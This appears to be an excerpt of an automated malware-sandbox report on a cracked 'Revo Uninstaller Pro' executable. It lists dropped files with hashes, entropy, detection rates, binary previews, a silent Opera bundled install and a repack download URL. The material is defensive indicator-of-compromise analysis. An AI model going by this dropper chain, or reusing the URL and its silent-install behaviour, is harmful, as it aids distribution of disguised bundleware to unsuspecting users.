                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):19750912
                                                                                                                                            Entropy (8bit):5.916143535151713
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:GEKRfz9PgHG9uUkqS/cmsLPGkLgHfC8wlPWz88RlfpwrjsWWv89uwbSzAMZo6h8e:GRfB2upPBxAUg/Jb9R
                                                                                                                                            MD5:E821132DBECE4D288D3B1B3B68373B3A
                                                                                                                                            SHA1:DAC86F72E5C2AAEB5EFDFEA06BF9C5DEF980C74E
                                                                                                                                            SHA-256:E786FA86DB21A4FFE8F78EBF032715390C05D1EDBDB6C90FEF75E0ED3D946CD3
                                                                                                                                            SHA-512:4701788F4A91F76F3A63843935DF5A8F80535D85FF0F760AF86C21601D73B40F8C4D00A883DC64E50482C201BB7D4F3867A038223593227AC79AA14520F2068E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ ......KX..:P......._.....................................................-.(.................R.......................................!........tableILogsILogs..CREATE TABLE [ILogs] ([Number] INTEGER PRIMARY KEY NOT NULL UNIQUE, [Name] TEXT NOT NULL, [Publisher] TEXT, [Version] TEXT NOT NULL, [GUID] TEXT NOT NULL UNIQUE, [WVer] TEXT NOT NULL, [WVer64Bits] INTEGER NOT NULL, [RKey] TEXT, [RDN] TEXT, [RUS] TEXT, [RPVer] TEXT)*...=...indexsqlite_autoindex_ILogs_2ILogs..*...=...indexsqlite_autoindex_ILogs_1ILogs.......Q.5G!..indexsqlite_autoindex_ILogs_bak0_2ILogs_bak0....UG!..indexsqlite_autoindex_ILogs_bak0_1ILogs_bak0.... .!!...tableILogs_bak0ILogs_bak0.CREATE TABLE "ILogs_bak0" ([Number] INTEGER PRIMARY KEY NOT NULL UNIQUE, [Name] TEXT NOT NULL, [Version] TEXT NOT NULL, [GUID] TEXT NOT NULL UNIQUE, [WVer] TEXT NOT NUL...T))._tablecreation_tablecreation_tableC.CREATE TABLE creation_table (tmp INTEGER)X........tableInfoInfo.CREATE TABLE Info (NProgs TEXT, Ver TEXT, D
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10103264
                                                                                                                                            Entropy (8bit):6.199563892292486
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:196608:TqWbk1lXrMI8h9rGe2DvwfaycAE9kspvCJ6UkXzp91IIH91IL91I0:Tq2OiI8h8rBx91IW91IL91I0
                                                                                                                                            MD5:216B49B7EB7BE44D7ED7367F3725285F
                                                                                                                                            SHA1:CF0776ECBC163C738FD43767BEDCC2A67ACEF423
                                                                                                                                            SHA-256:C6D97857B3B9F26C8E93D7B6E6481F93A16DB75CBF9D1756CB29FBA0FD9E240E
                                                                                                                                            SHA-512:060FB76D91BEE1B421F133CAE17726A68ADC97DDCE76A67196D10E735E216D032BEE939C905B847C50F29E859DCA43CDF1B19E4AE349E00EFE88147224D665CB
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....?Y..................^..L;.......^.......^...@.......................... ..................@...................@i.b.....h..k...0q...1..............5...pi..............................`i.......................h......0i......................text....n^......p^................. ..`.itext..x2....^..4...t^............. ..`.data....-....^.......^.............@....bss.........._..........................idata...k....h..l...._.............@....didata......0i......B`.............@....edata..b....@i......N`.............@..@.tls.........Pi..........................rdata.......`i......P`.............@..@.reloc.......pi......R`.............@..B.rsrc.....1..0q...1...h.............@..@............. ......................@..@................
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):65794
                                                                                                                                            Entropy (8bit):7.997450817749907
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:1536:wg8dvQaFp4zqjLCzkCYlnXMEbnxbiHgsWtXTiKE6AXutI0b:6dvPFHLCzYlnXBUg3TibT+5
                                                                                                                                            MD5:8462A9B69C76A9603A4143D51FBC201E
                                                                                                                                            SHA1:4473590F93F94F22C340A354516191C3C0BA6532
                                                                                                                                            SHA-256:FE4BCB4251F77375119A936C80FB36221AF0C5105E840E2E115D47F96CB437C8
                                                                                                                                            SHA-512:2F02ECDB06760A093F4D8E6F04C97138695B064DB8CB2DCC4AF9B47C829852F38B77BE9425EB2F3E3E36F85DA181C116C829921FA35AE68AFC57C728D5393570
                                                                                                                                            Malicious:false
                                                                                                                                            Preview: ...h..$...n.y].o~....(...G..\.....%..c..<..`......*..../p...N.?H.K....*...c.1~.K...No.yF...$..u..1z..-....>..1.jT=.....t....m.45`D.).w..d]m..F....s3=..6.#.....F...*j.Z..^...:\).......?..f39.$E.F.&....L)..*$dQ.F..T..j.p..h@..b..Qd..H.gO.q..>.....WA...[...P...Jf....".....KV.,.,D_I.b,._..r..g....B.I.....F..Dh3...4..Bg..........P.,y....9B.\..).7...v..d:.b...L........ ?._. .>o..@q......K.........\...jv;.......{}....UH..J/.|..1.g"N.#PRB.c...D..=d.g.........9.....h.%i...-Q55....W...1g.[.=]..<$.4..]7K.Y.T.....q....1...s....N. EC.E.Ov.S..G.YE....g.......U..]...c..<...........2W.'..2.!....AE$@..H........8A.\.H.f.x\.|o.z.u%9.X...u>7....\'.VX.5=HR.."D~Y...9...r3.u.3...........jL...m`...d..vA...Q.l^.....8=.F.0.l..eg;b.....H.CwjbV3.... N............@.o.m.R..|n.e.\.......6..._.p.....r..U..Ha......r...)..%.qeg..(o..;...H....L*6.-...I.Q..V....b>Z.z.n.0!...O&..#.`..8.......y:..M..S........v..a;E\d.].!.7.....2M.$,...&..lu...)...U..i...P4..8.*1..6..k.
                                                                                                                                            Process:C:\Windows\System32\runonce.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):24576
                                                                                                                                            Entropy (8bit):2.0764594067753155
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:jQHNNkTIhl2UUooDDLyeo3JkwzAvS3ZE/kiF/hcvLwGqOjoF8GayaQupnMJP7E4r:jR
                                                                                                                                            MD5:8BB9716E539DBF0AEC99899A6B8DD3E9
                                                                                                                                            SHA1:7BB357E82C226028A2728CE164EB070BFD2A554B
                                                                                                                                            SHA-256:F52F7593DBF72AA12E21391E470911EAD8BDEFB9922E801E0CAC07AB333445B5
                                                                                                                                            SHA-512:C1FEE5DDF66B8D94D3245F4F53578E4417F6E4E554F8D1CDC8038F1E1E367B309BF6DE039A3E0FE293216C3866709A17F3E19CC5E278CAE7E7B932D8A92258A9
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:. ..................................................................................|....9............... ......eJ..........XJ..Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...........................................................`k..b............L..XJ..........E.x.p.l.o.r.e.r.S.t.a.r.t.u.p.L.o.g._.R.u.n.O.n.c.e...C.:.\.U.s.e.r.s.\.t.i.n.a.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.E.x.p.l.o.r.e.r.\.E.x.p.l.o.r.e.r.S.t.a.r.t.u.p.L.o.g._.R.u.n.O.n.c.e...e.t.l.............P.P.....|....8..............................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2227280
                                                                                                                                            Entropy (8bit):7.916292078000363
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:2VAbw0dQH5x+E1Q9AA06OT9S7+rICzXNagRt532Z8JtX:yAJdi3+ZN06+Nzdn5w8n
                                                                                                                                            MD5:43D37A6E0FE6E9824DFD80221E6AAD13
                                                                                                                                            SHA1:C0413529476272EF942F5CE48187974C060E5DFF
                                                                                                                                            SHA-256:6C7EC72B5223501E376688CECE1DFADDA6DE77209F15439945129B7F5428D4B0
                                                                                                                                            SHA-512:37FB9001682974DF2E2DF02C1362C96AF42BE933AB1F714E3737D1E7280F789778C54E4A11651F94993617F0742826376CB76507158F8E5B49655EA9C5D9EB73
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N....m...m...m..A....m..A....m...._m.....m.....m..A....m..A....m...m...m....\m....X..m...m0..m.....m..Rich.m..........PE..L.....if...............'..........................@..................................."...@.................................H...d.......p.............!..+.......1...C...............................C..@...............0............................text............................... ..`.rdata..z...........................@..@.data....K..........................@....rsrc...p...........................@..@.reloc...1.......2..................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
                                                                                                                                            File Type:JSON data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1768
                                                                                                                                            Entropy (8bit):4.387813928994183
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:YqRyRrRs2RDtRCRa7jRzRMR9R89R/R5DR3RoRXsRWEIiRTRRR4RbR8xRSRGjRIjv:FCFVDjS49QzqZ5NhMXwWELd3c18XiWMd
                                                                                                                                            MD5:9C6D510D7C361909745710CFD3E10106
                                                                                                                                            SHA1:FB4E8BA3F4EFDA5CA35C7BEDED0410A40003FB6E
                                                                                                                                            SHA-256:27BA82B595C219C0FA8422555E0507119EFF0C229D3E6D8D70EB40010322FBF7
                                                                                                                                            SHA-512:C1A114BBF6F3CAD808F291BEE3981DEDD751A57EE839A1BCDBB7D2EE2D1592BC3269786BB09AC5E06F7B0F1D88BFA0C08F8A50D65B2FC4C1DB6B094C7AE4D724
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:{"features":{"01979299c8cd":{"state":"enabled"},"03b8357e5a08":{"state":"enabled"},"06fbbd0b7bf7":{"state":"enabled"},"0f9cf8758bcc":{"state":"disabled"},"1c4dddb65bac":{"state":"enabled"},"1d24dceb937a":{"state":"enabled"},"2114dc8bd72a":{"state":"enabled"},"26f7e2d59ecf":{"state":"enabled"},"278deecb29a1":{"state":"enabled"},"3389f6c15eb9":{"state":"enabled"},"3993848b2bd9":{"state":"enabled"},"3fc0872a857b":{"state":"enabled"},"40db6e644d2c":{"state":"disabled"},"50796754ffc7":{"state":"enabled"},"5448a57d6689":{"state":"disabled"},"54a846ecd4f2":{"state":"enabled"},"56d717ae3ad6":{"state":"enabled"},"5a28d66c82cd":{"state":"enabled"},"5aceda74693f":{"state":"enabled"},"5ee708e89d7b":{"state":"disabled"},"603cade21cf7":{"state":"enabled"},"654296fe9d6c":{"state":"enabled"},"6713f3df0bed":{"state":"enabled"},"804beb213cf7":{"state":"enabled"},"818c3ef12d0b":{"state":"enabled","dna_filter":{"required_dna":["64336fb81a04836eb8108d24fbca3aa3682db0a5"],"forbidden_dna":["5b3eb4a6c335a0659
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):419886
                                                                                                                                            Entropy (8bit):7.320460842483817
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:q/iQb+ckQsH8TDRGKJkSvGUlYG2EY8NqK9XXHJoPNKAZzOndNyLMfjRxXdS:5Qnk3GDYKGcblBY8Y23mZ0dYmV0
                                                                                                                                            MD5:A868E9C0A97C2EF80602C0F6634913F8
                                                                                                                                            SHA1:9E3F70A600DDC17D018612B08854F702E24AE5D3
                                                                                                                                            SHA-256:691DF930404FB3CB974F183C849C4B1EDDC63EC3BCA579EEE24F8A59E702FE11
                                                                                                                                            SHA-512:611D06A34D007CB4D321400A318BA727B07971916F7207EF7D0D45383B7DC38361EA296904646F9079D9C42D87BD375F500D969BF9AA9C6906472655D84E6EF1
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 30%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...,...._......._..'...._f.'...._..'...Rich&...................PE..L....}|^..................................... ....@..................................D....@.........................@...4...t...<.... ..''...................P...!.....T............................B..@............ ..`...... ....................text............................... ..`.rdata..2.... ......................@..@.data....8..........................@....gfids..............................@..@.rsrc...''... ...(..................@..@.reloc...!...P..."..................@..B........................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):31822848
                                                                                                                                            Entropy (8bit):7.99964019043844
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:786432:J51VbF0ZYe+/4l0aSJAmhdidmunuJH2XXCzQSBsC7d:n7yZY5/4lwimbCtaWcBs8
                                                                                                                                            MD5:8C69A7261DEEDDA409FEE047BECEB349
                                                                                                                                            SHA1:C800F3951228A00B737DB409F6E228F81B4C00C1
                                                                                                                                            SHA-256:E1B650EBDCAAFA894F98D3BD61754DBAA635AE2E6DCF3C90B408A1AD25E4FED8
                                                                                                                                            SHA-512:21ADB1A4A48C2967DB5CD66E5E2EFC21330B5543C9B079C54825B719A77311A8F20D25B0806EA17E0795687FC06661C17FF0111A16FF8BCFE5C7E019FD002858
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......(2S&lS=ulS=ulS=u'+>t`S=u'+8t.S=u..8tAS=u..9t.S=u..>tyS=u'+9tyS=u'+<teS=ulS<u.S=u..5t:S=u...umS=ulS.umS=u..?tmS=uRichlS=u........PE..L...4.if...............'..........................@................................./.&...@..................................R..d....................y&..).......&......................................@............................................text............................... ..`.rdata..............................@..@.data....A...`.......J..............@....rsrc................`..............@..@.reloc...&.......(...j..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):35
                                                                                                                                            Entropy (8bit):4.036006945330954
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:N8MfXFLVt:2ghVt
                                                                                                                                            MD5:9D1787D69C72AE1531A6EFE6C058EBFA
                                                                                                                                            SHA1:847875E77AF8048EDF1A8A6D732D48F2A9B5CC96
                                                                                                                                            SHA-256:8C041E42595D9BF69B3293050B297A4BE644F57162DD362CA9C0E2EC15CE538D
                                                                                                                                            SHA-512:9A8CA8DFDEF274561C467B50C837C4BCA2A632995CEF8EDB565FA2872D4BD952EFD2EA0BDF32DA252CA0F949704245B8D335F1737B35F4D71ED35ADEFEE8F7C8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:https://mail.repack.me/tsjtmfdm.pkg
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2228
                                                                                                                                            Entropy (8bit):5.377524745892739
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:gPWSU4y4RQmFoUeWmfgZ9tK8NPZHYs7u1iMuge//8vUyus:oLHyIFKL3IZ2KRHnOugMs
                                                                                                                                            MD5:1780C010278B6426194BC6A53B9C0AB7
                                                                                                                                            SHA1:5316AD6B86650DB63909DC72E5971A3324ADD37B
                                                                                                                                            SHA-256:775E4845DE268465238A57A17DDFC051F2CF2D87BB676E2BEC443A969FAA96D2
                                                                                                                                            SHA-512:2BBE361AFF6ACFE887FA5CDFB735C7C59F85A355CE8331D18A729E7CB5FF4B996D700D74CBF69160800264AA69BE4BA7CA6414C6EA780DF821E6B2C6483E2F99
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):31822848
                                                                                                                                            Entropy (8bit):7.99964019043844
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:786432:J51VbF0ZYe+/4l0aSJAmhdidmunuJH2XXCzQSBsC7d:n7yZY5/4lwimbCtaWcBs8
                                                                                                                                            MD5:8C69A7261DEEDDA409FEE047BECEB349
                                                                                                                                            SHA1:C800F3951228A00B737DB409F6E228F81B4C00C1
                                                                                                                                            SHA-256:E1B650EBDCAAFA894F98D3BD61754DBAA635AE2E6DCF3C90B408A1AD25E4FED8
                                                                                                                                            SHA-512:21ADB1A4A48C2967DB5CD66E5E2EFC21330B5543C9B079C54825B719A77311A8F20D25B0806EA17E0795687FC06661C17FF0111A16FF8BCFE5C7E019FD002858
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......(2S&lS=ulS=ulS=u'+>t`S=u'+8t.S=u..8tAS=u..9t.S=u..>tyS=u'+9tyS=u'+<teS=ulS<u.S=u..5t:S=u...umS=ulS.umS=u..?tmS=uRichlS=u........PE..L...4.if...............'..........................@................................./.&...@..................................R..d....................y&..).......&......................................@............................................text............................... ..`.rdata..............................@..@.data....A...`.......J..............@....rsrc................`..............@..@.reloc...&.......(...j..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5740952
                                                                                                                                            Entropy (8bit):6.869655224466312
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:98304:Y5hxwD6666666666666666666666666666666x666666666666666fwwwwwwwwwt:H3gRKPR+UIYbL8v515oa7IC
                                                                                                                                            MD5:F9DA76E8D7DB633AB031EE5AC59BB55E
                                                                                                                                            SHA1:ACD4E95365DBD1256B8DDAA747C82AD8EF3D85CD
                                                                                                                                            SHA-256:2A4E429693A6DA362CD89967271831B99C88F0C6F696946E66852969D883233B
                                                                                                                                            SHA-512:76BBBD271182109E501482A23D136DA0C8A4669664A9B284C7C8249870D1CE47191BEFA69D668719B63225211A4F9DB8B63E3BAB41D5F35C33455B4D18832513
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Ng.........."......d....S...................@...........................W.....t.X...@.................................8%..P.........Q..........pW..)....W..6...".......................!.......................'...............................text...;b.......d.................. ..`.rdata...............h..............@..@.data...$5...P.......8..............@....tls.................V..............@....rsrc.....Q.......Q..X..............@..@.reloc...6....W..8...8W.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
                                                                                                                                            File Type:ASCII text, with very long lines (1610)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5574
                                                                                                                                            Entropy (8bit):5.7340486197201335
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:EXuK//L7gmkBUST5E7nDM3pnklTc//MEgUTl+60XLNO:+uK/lkfT5ELDM3pnklg/+UTl+vLk
                                                                                                                                            MD5:020AE0DAA5916B1800513A8CE522A275
                                                                                                                                            SHA1:1192BE49BD5E290FF6CD1B8A40650174EA74972F
                                                                                                                                            SHA-256:67638D9F3310DB3046A7BF536CA142BF57B0C537E80D5D93BC67443958518AEC
                                                                                                                                            SHA-512:585C886336C157A05CD50EFBB68DA3035D0E64418B52ED4C5AA1B458654738CB31A36158C3F5BB945139DC6A1C32809190816F121750C62F052A8781CE239E8C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:[1209/114003.209:INFO:installer_main.cc(475)] Opera installer starting - version 115.0.5322.77 Stable.[1209/114003.209:INFO:installer_main.cc(478)] Command line: "C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe" --silent --allusers=0 --server-tracking-blob=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.[1209/114003.225:INFO:installer_main.cc(500)] Uninstall:0.[1209/114003.225:INFO:installer_main.cc(501)] Silent:1.[1209/114003.225:INFO:installer_main.cc(502)] Run Immediately0.[1209/114003.225:INFO:installer_main.cc(504)] B
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
                                                                                                                                            File Type:ASCII text, with very long lines (1569)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2992
                                                                                                                                            Entropy (8bit):5.677553613250637
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:abb4hXrb7wZU6QM3wZLOgqwZdLnMfcVBJTleVnZ/Q5VEb67CZwt3MbLfXwZ7bmbB:LXzDM3pnklTc//MEgUdAxgUPSLP
                                                                                                                                            MD5:BFFE7237DB5A3CA7AEFE80E8B4F8EB1F
                                                                                                                                            SHA1:FCF9C72EB121BF293314E843150C392EF2F1E90A
                                                                                                                                            SHA-256:AF1DA756B3DA7FDE72892EA3BD1B5866B3694816E10C9F784251992E0D5337B6
                                                                                                                                            SHA-512:2AC3AFF782A6D369DC88BA0F43BA6F03D8E3F668F6BBDF68D9EE8329736B695CB26D91E1B7F9FD989CC3C5A412FB7AAAA3050E5AB3880EB0B77D79584E388006
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:[1209/114005.402:INFO:installer_main.cc(475)] Opera installer starting - version 115.0.5322.77 Stable.[1209/114005.402:INFO:installer_main.cc(478)] Command line: "C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --showunbox=0 --installfolder="C:\Users\user\AppData\Local\Programs\Opera" --profile-folder --language=en-GB --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3532 --package-dir-prefix="C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20241209114004" --session-guid=00c18248-fcc9-4b6b-a8b7-0c50518d9022 --server-tracking-blob=MWZkNGE2YjNhYTYzYjQxNzE2YmZkZTM0YzhlOTRjYTQ1ODNlOGY3ODRmYzMyNmQ3ZDRj
                                                                                                                                            Process:C:\Users\user\Downloads\OperaSetup.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5740952
                                                                                                                                            Entropy (8bit):6.869655224466312
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:98304:Y5hxwD6666666666666666666666666666666x666666666666666fwwwwwwwwwt:H3gRKPR+UIYbL8v515oa7IC
                                                                                                                                            MD5:F9DA76E8D7DB633AB031EE5AC59BB55E
                                                                                                                                            SHA1:ACD4E95365DBD1256B8DDAA747C82AD8EF3D85CD
                                                                                                                                            SHA-256:2A4E429693A6DA362CD89967271831B99C88F0C6F696946E66852969D883233B
                                                                                                                                            SHA-512:76BBBD271182109E501482A23D136DA0C8A4669664A9B284C7C8249870D1CE47191BEFA69D668719B63225211A4F9DB8B63E3BAB41D5F35C33455B4D18832513
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Ng.........."......d....S...................@...........................W.....t.X...@.................................8%..P.........Q..........pW..)....W..6...".......................!.......................'...............................text...;b.......d.................. ..`.rdata...............h..............@..@.data...$5...P.......8..............@....tls.................V..............@....rsrc.....Q.......Q..X..............@..@.reloc...6....W..8...8W.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5189528
                                                                                                                                            Entropy (8bit):6.8622234075396875
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:98304:T6666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwL:H3gRKPR+UIYbL8v515oa7I3
                                                                                                                                            MD5:11054504E4BFC58D4E36F5799797FC09
                                                                                                                                            SHA1:6DB3FFCD7771E4B153C63872A3711D3EFEA2495A
                                                                                                                                            SHA-256:BFD03E0DC2A9ADDD6FDB8FBB1309B7C72C708CF931ED9FB83849BD658C37437A
                                                                                                                                            SHA-512:7E978B663CF75B31CD067E16136F9062918081E8AD5060709EA95EB08B7922B0A4090718C694D1A0A77DEEF0A8550984AB01A54EADE3950FFF2D359AB1717E2B
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Ng.........."!.....68...........(.......................................P.....{aO...@A..........................@.m.....@.......C.8=............O..)...PO.t....J@.....................@J@.....8W8...............@.$.....@.`....................text....48......68................. ..`.rdata......P8......:8.............@..@.data...<.....A..B....@.............@....rodata.......B...... A............. ..`.tls..........B......"A.............@...CPADinfo0.....B......$A.............@...malloc_h......C......&A............. ..`.rsrc...8=....C..>...(A.............@..@.reloc..t....PO......fM.............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5189528
                                                                                                                                            Entropy (8bit):6.8622234075396875
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:98304:T6666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwL:H3gRKPR+UIYbL8v515oa7I3
                                                                                                                                            MD5:11054504E4BFC58D4E36F5799797FC09
                                                                                                                                            SHA1:6DB3FFCD7771E4B153C63872A3711D3EFEA2495A
                                                                                                                                            SHA-256:BFD03E0DC2A9ADDD6FDB8FBB1309B7C72C708CF931ED9FB83849BD658C37437A
                                                                                                                                            SHA-512:7E978B663CF75B31CD067E16136F9062918081E8AD5060709EA95EB08B7922B0A4090718C694D1A0A77DEEF0A8550984AB01A54EADE3950FFF2D359AB1717E2B
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Ng.........."!.....68...........(.......................................P.....{aO...@A..........................@.m.....@.......C.8=............O..)...PO.t....J@.....................@J@.....8W8...............@.$.....@.`....................text....48......68................. ..`.rdata......P8......:8.............@..@.data...<.....A..B....@.............@....rodata.......B...... A............. ..`.tls..........B......"A.............@...CPADinfo0.....B......$A.............@...malloc_h......C......&A............. ..`.rsrc...8=....C..>...(A.............@..@.reloc..t....PO......fM.............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe
                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5189528
                                                                                                                                            Entropy (8bit):6.8622234075396875
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:98304:T6666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwL:H3gRKPR+UIYbL8v515oa7I3
                                                                                                                                            MD5:11054504E4BFC58D4E36F5799797FC09
                                                                                                                                            SHA1:6DB3FFCD7771E4B153C63872A3711D3EFEA2495A
                                                                                                                                            SHA-256:BFD03E0DC2A9ADDD6FDB8FBB1309B7C72C708CF931ED9FB83849BD658C37437A
                                                                                                                                            SHA-512:7E978B663CF75B31CD067E16136F9062918081E8AD5060709EA95EB08B7922B0A4090718C694D1A0A77DEEF0A8550984AB01A54EADE3950FFF2D359AB1717E2B
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
